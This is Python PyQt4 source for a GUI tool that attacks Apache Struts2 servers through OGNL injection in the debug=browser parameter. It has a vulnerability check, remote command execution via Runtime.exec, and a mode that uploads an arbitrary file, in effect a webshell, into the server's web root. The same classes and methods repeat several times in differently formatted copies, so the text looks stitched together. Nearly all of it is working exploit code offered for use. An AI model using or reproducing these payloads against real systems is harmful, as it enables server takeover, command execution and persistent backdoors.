def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self.ui = Ui_MainWindow() #框主题名称
self.ui.setupUi(self)
QtCore.QObject.connect(self.ui.lineEdit,
QtCore.SIGNAL('returnPressed()'), self.Go)
QtCore.QObject.connect(self.ui.pushButton, QtCore.SIGNAL("clicked()"),
self.Go)
QtCore.QObject.connect(self.ui.comboBox,
QtCore.SIGNAL("currentIndexChanged(int)"),
self.mode)
QtCore.QObject.connect(self.ui.pushButton_2,
QtCore.SIGNAL("clicked()"), self.file_dialog)
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self.ui = Ui_MainWindow() #框主题名称
self.ui.setupUi(self)
QtCore.QObject.connect(self.ui.lineEdit, QtCore.SIGNAL('returnPressed()'), self.Go)
QtCore.QObject.connect(self.ui.pushButton, QtCore.SIGNAL("clicked()"), self.Go)
QtCore.QObject.connect(self.ui.comboBox, QtCore.SIGNAL("currentIndexChanged(int)"), self.mode)
QtCore.QObject.connect(self.ui.pushButton_2, QtCore.SIGNAL("clicked()"), self.file_dialog)
class StartQt4(QtGui.QMainWindow):
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self.ui = Ui_MainWindow() #框主题名称
self.ui.setupUi(self)
QtCore.QObject.connect(self.ui.lineEdit, QtCore.SIGNAL('returnPressed()'), self.Go)
QtCore.QObject.connect(self.ui.pushButton, QtCore.SIGNAL("clicked()"), self.Go)
QtCore.QObject.connect(self.ui.comboBox, QtCore.SIGNAL("currentIndexChanged(int)"), self.mode)
QtCore.QObject.connect(self.ui.pushButton_2, QtCore.SIGNAL("clicked()"), self.file_dialog)
def PoC_POST(self):
#此为PoC的POST方法
try:
payload= "debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=Go!St2"
res = urllib.request.Request(self.address, payload.encode("utf-8"))
data = urllib.request.urlopen(res).read().decode("utf-8")
self.ui.textBrowser.setText("测试结果:\n%s" %(data)) #将结果输出至textBrowser
except Exception as e:
self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e))
def PoC(self):
#此为PoC的GET方法
payload= "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=Go!St2"
target_url = (self.address + payload)
try:
data = requests.get(target_url).content.decode("utf-8")
self.ui.textBrowser.setText("测试结果:\n%s" %(data)) #将结果输出至textBrowser
except Exception as e:
self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e))
def cmd(self):
self.command = str(self.ui.command.text())
payload= "?debug=browser&object=(%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23context[%23parameters.rpsobj[0]].getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()))):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789&command="
target_url = (self.address + payload + self.command)
#print(target_url)
try:
req = urllib.request.Request(target_url, method = "GET")
response = urllib.request.urlopen(req)
data = response.read()
data = str(data, encoding = "utf-8")
self.ui.textBrowser.setText("%s命令执行结果:\n%s" %(self.command, data.rstrip())) #将结果输出至textBrowser
except Exception as e:
self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e))
def Go(self):
self.address = str(self.ui.lineEdit.text())
if self.address:
if self.address.find('://') == -1:
self.address = 'http://' + self.address
if self.ui.comboBox.currentIndex() == 0:
self.PoC()
if self.ui.comboBox.currentIndex() == 1:
self.cmd()
elif self.ui.comboBox.currentIndex() == 2:
self.upload()
def file_dialog(self):
fd = QtGui.QFileDialog(self)
self.file = fd.getOpenFileName()
from os.path import isfile
if isfile(self.file):
import codecs
text = codecs.open(self.file, "r", "utf-8").read() #弹出文件选择对话框
self.filename = str(self.ui.filename.text())
def upload(self):
get_path = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS),%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23parameters.content[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=111&content="
target_url = (self.address + get_path)
try:
req = urllib.request.Request(target_url, method = "GET")
response = urllib.request.urlopen(req)
if response:
data = response.read()
data = str(data, encoding = "utf-8")
except Exception as e:
self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e))
data = data.strip()
#print(data)
shellpath = data
content = (open(self.file, "r").read())
#print(content)
temp = "&reqobj=%s&reqobj=%s&content=%s" %(shellpath + "/" + self.filename, shellpath + "/" + self.filename, content)
#print(temp)
payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS),%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23parameters.reqobj[1],%23fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23parameters.reqobj[2]),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&"
target_url = (self.address + payload + temp)
#print(target_url)
try:
#print(target_url)
req = requests.get(target_url)
data = req.content
#print(data)
data = str(data, encoding = "utf-8")
self.ui.textBrowser.setText("上传成功,文件路径是:\n%s" %(shellpath + "/" + self.filename)) #将结果输出至textBrowser
except Exception as e:
self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e))
def mode(self):
self.ui.comboBox.currentIndex()
class StartQt4(QtGui.QMainWindow):
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self.ui = Ui_MainWindow() #框主题名称
self.ui.setupUi(self)
QtCore.QObject.connect(self.ui.lineEdit,
QtCore.SIGNAL('returnPressed()'), self.Go)
QtCore.QObject.connect(self.ui.pushButton, QtCore.SIGNAL("clicked()"),
self.Go)
QtCore.QObject.connect(self.ui.comboBox,
QtCore.SIGNAL("currentIndexChanged(int)"),
self.mode)
QtCore.QObject.connect(self.ui.pushButton_2,
QtCore.SIGNAL("clicked()"), self.file_dialog)
def PoC(self):
payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=Go!St2"
target_url = (self.address + payload)
#print(target_url)
try:
req = urllib.request.Request(target_url, method="GET")
response = urllib.request.urlopen(req)
if response:
data = response.read()
data = str(data, encoding="utf-8")
self.ui.textBrowser.setText("测试结果:\n%s" %
(data)) #将结果输出至textBrowser
except Exception as e:
self.ui.textBrowser.setText("出现错误,错误回显为:%s" % (e))
def cmd(self):
self.command = str(self.ui.command.text())
payload = "?debug=browser&object=(%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23context[%23parameters.rpsobj[0]].getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()))):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789&command="
target_url = (self.address + payload + self.command)
#print(target_url)
try:
req = urllib.request.Request(target_url, method="GET")
response = urllib.request.urlopen(req)
data = response.read()
data = str(data, encoding="utf-8")
self.ui.textBrowser.setText(
"%s命令执行结果:\n%s" %
(self.command, data.rstrip())) #将结果输出至textBrowser
except Exception as e:
self.ui.textBrowser.setText("出现错误,错误回显为:%s" % (e))
def Go(self):
self.address = str(self.ui.lineEdit.text())
if self.address:
if self.address.find('://') == -1:
self.address = 'http://' + self.address
if self.ui.comboBox.currentIndex() == 0:
self.PoC()
if self.ui.comboBox.currentIndex() == 1:
self.cmd()
elif self.ui.comboBox.currentIndex() == 2:
self.upload()
def file_dialog(self):
fd = QtGui.QFileDialog(self)
self.file = fd.getOpenFileName()
from os.path import isfile
if isfile(self.file):
import codecs
text = codecs.open(self.file, "r", "utf-8").read() #弹出文件选择对话框
self.filename = str(self.ui.filename.text())
def upload(self):
get_path = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS),%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23parameters.content[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=111&content="
target_url = (self.address + get_path)
try:
req = urllib.request.Request(target_url, method="GET")
response = urllib.request.urlopen(req)
if response:
data = response.read()
data = str(data, encoding="utf-8")
except Exception as e:
self.ui.textBrowser.setText("出现错误,错误回显为:%s" % (e))
data = data.strip()
#print(data)
shellpath = data
content = (open(self.file, "r").read())
#print(content)
temp = "&reqobj=%s&reqobj=%s&content=%s" % (
shellpath + "/" + self.filename, shellpath + "/" + self.filename,
content)
#print(temp)
payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS),%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23parameters.reqobj[1],%23fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23parameters.reqobj[2]),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&"
target_url = (self.address + payload + temp)
#print(target_url)
try:
#print(target_url)
req = requests.get(target_url)
data = req.content
#print(data)
data = str(data, encoding="utf-8")
self.ui.textBrowser.setText(
"上传成功,文件路径是:\n%s" %
(shellpath + "/" + self.filename)) #将结果输出至textBrowser
except Exception as e:
self.ui.textBrowser.setText("出现错误,错误回显为:%s" % (e))
def mode(self):
self.ui.comboBox.currentIndex()
class StartQt4(QtGui.QMainWindow):
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self.ui = Ui_MainWindow() #框主题名称
self.ui.setupUi(self)
QtCore.QObject.connect(self.ui.lineEdit, QtCore.SIGNAL('returnPressed()'), self.Go)
QtCore.QObject.connect(self.ui.pushButton, QtCore.SIGNAL("clicked()"), self.Go)
QtCore.QObject.connect(self.ui.comboBox, QtCore.SIGNAL("currentIndexChanged(int)"), self.mode)
QtCore.QObject.connect(self.ui.pushButton_2, QtCore.SIGNAL("clicked()"), self.file_dialog)
def PoC(self):
payload= "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=Go!St2"
target_url = (self.address + payload)
#print(target_url)
try:
req = urllib.request.Request(target_url, method = "GET")
response = urllib.request.urlopen(req)
if response:
data = response.read()
data = str(data, encoding = "utf-8")
self.ui.textBrowser.setText("测试结果:\n%s" %(data)) #将结果输出至textBrowser
except Exception as e:
self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e))
def cmd(self):
self.command = str(self.ui.command.text())
payload= "?debug=browser&object=(%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23context[%23parameters.rpsobj[0]].getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()))):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789&command="
target_url = (self.address + payload + self.command)
#print(target_url)
try:
req = urllib.request.Request(target_url, method = "GET")
response = urllib.request.urlopen(req)
data = response.read()
data = str(data, encoding = "utf-8")
self.ui.textBrowser.setText("%s命令执行结果:\n%s" %(self.command, data.rstrip())) #将结果输出至textBrowser
except Exception as e:
self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e))
def Go(self):
self.address = str(self.ui.lineEdit.text())
if self.address:
if self.address.find('://') == -1:
self.address = 'http://' + self.address
if self.ui.comboBox.currentIndex() == 0:
self.PoC()
if self.ui.comboBox.currentIndex() == 1:
self.cmd()
elif self.ui.comboBox.currentIndex() == 2:
self.upload()
def file_dialog(self):
fd = QtGui.QFileDialog(self)
self.file = fd.getOpenFileName()
from os.path import isfile
if isfile(self.file):
import codecs
text = codecs.open(self.file, "r", "utf-8").read() #弹出文件选择对话框
self.filename = str(self.ui.filename.text())
def mode(self):
self.ui.comboBox.currentIndex()
